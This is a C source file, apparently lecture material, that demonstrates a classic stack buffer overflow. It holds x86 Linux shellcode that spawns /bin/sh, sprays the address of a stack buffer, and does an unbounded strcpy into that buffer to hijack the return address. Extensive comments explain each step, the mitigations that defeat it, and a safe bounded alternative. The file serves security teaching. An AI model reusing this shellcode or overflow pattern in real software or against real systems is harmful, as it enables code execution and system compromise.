author | Christian Urban <christian dot urban at kcl dot ac dot uk> |
Tue, 26 Sep 2017 12:10:41 +0100 | |
changeset 534 | 62985f147c85 |
parent 476 | cd82c24373cd |
permissions | -rw-r--r-- |
#include <string.h> |
#include <stdio.h> |
#include <stdlib.h> |
/*
 * Payload bytes used by the overflow demonstration in main(): 38 bytes of
 * raw machine code followed by the 7-byte path "/bin/sh" (45 bytes plus the
 * implicit terminator). None of the 45 bytes is zero, so strlen() and
 * strcpy() treat the whole sequence as one C string.
 *
 * The pair \xcd\x80 encodes `int 0x80` on x86, so this appears to be a
 * 32-bit x86 Linux payload.
 * NOTE(review): target architecture is inferred from the bytes -- confirm.
 *
 * The array itself is ordinary writable data. It has an effect only if
 * execution is redirected into a copy of it, which requires that copy to
 * live in executable memory; a non-executable stack/data mapping (NX/DEP)
 * blocks exactly that step.
 */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
  "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
  "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
  "\xff\xff/bin/sh";

/*
 * Staging buffer for the oversized source string. File scope, so it starts
 * zero-filled; at 128 bytes it is 32 bytes larger than the 96-byte
 * destination that main() copies it into.
 */
char large_string[128];
/*
 * Self-contained stack buffer overflow demonstration.
 *
 * Builds a 128-byte source string (payload bytes first, the address of
 * `buffer` repeated behind them) and copies it with an unbounded strcpy()
 * into a 96-byte stack array. Everything after the first 96 bytes lands on
 * whatever the compiler placed next to `buffer`.
 * NOTE(review): the intent is presumably to overwrite main()'s saved return
 * address with the address of `buffer`; the exact frame layout is not
 * visible here and depends on compiler, flags and ABI.
 *
 * Assumptions baked into the code (all break on a modern 64-bit build):
 *   - sizeof(long) == 4, so 32 longs exactly fill large_string[128];
 *   - a pointer fits in an int, so the (int) cast keeps the full address;
 *   - the stack is executable and its addresses are stable enough to embed.
 *
 * Why current toolchains stop it, in the order the checks fire:
 *   - _FORTIFY_SOURCE: the destination size is known at compile time, so
 *     the checked strcpy aborts on the oversized copy;
 *   - -fstack-protector: a canary between `buffer` and the return address
 *     is verified before the function returns;
 *   - NX / non-executable stack: bytes in `buffer` cannot be executed;
 *   - ASLR: the address of `buffer` changes per run (here the program reads
 *     its own address, so this matters for real targets, not this demo).
 *
 * Real code should bound the copy, e.g. snprintf(dst, sizeof dst, "%s", src)
 * with a truncation check, instead of calling strcpy() on a fixed array.
 */
void main() {   /* non-standard signature; the C standard specifies int main */
  char buffer[96];   /* fixed-size stack destination, 32 bytes smaller than the source */
  int i;
  long *long_ptr = (long *) large_string;   /* reinterpret the char array as an array of long */

  /*
   * Fill the source with the address of `buffer`, one long at a time.
   * This writes 32 * sizeof(long) bytes: 128 where long is 4 bytes, but 256
   * where long is 8 bytes, which runs past the end of large_string.
   * The (int) cast drops the upper half of the address on LP64 targets.
   */
  for (i = 0; i < 32; i++)
    *(long_ptr + i) = (int) buffer;

  /*
   * Overwrite the front of the source with the payload bytes. The
   * terminating NUL is not copied (the loop stops at strlen), and strlen()
   * is re-evaluated on every iteration; i is int while strlen() returns
   * size_t, so the comparison is done in unsigned arithmetic.
   */
  for (i = 0; i < strlen(shellcode); i++)
    large_string[i] = shellcode[i];

  /*
   * Unbounded copy -- the defect this file exists to show. strcpy() stops
   * only at the first zero byte, and the loops above never store a
   * terminator: the copy ends wherever an address byte happens to be zero,
   * or continues past large_string until one is found. Any length above 96
   * writes beyond `buffer`.
   */
  strcpy(buffer,large_string);
}